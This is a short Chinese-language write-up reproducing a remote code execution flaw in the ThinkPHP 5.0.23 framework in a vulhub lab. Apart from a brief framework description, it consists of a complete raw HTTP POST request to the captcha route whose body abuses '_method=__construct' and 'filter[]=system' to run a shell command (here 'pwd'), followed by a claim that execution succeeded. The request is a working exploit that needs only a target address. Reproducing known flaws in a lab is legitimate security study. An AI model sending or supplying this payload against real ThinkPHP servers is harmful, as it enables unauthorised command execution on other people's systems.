thinkphp 5.0.23 rce漏洞复现
thinkphp介绍
thinkphp是一个快速、兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相当多的CMS是在thinkphp基础上二次开发的。
环境搭建
使用vulhub搭建环境,过程不赘述。
漏洞复现
抓包并直接发送下面的流量包,即可利用漏洞进行远程代码执行
POST /index.php?s=captcha HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
发包可见,命令执行成功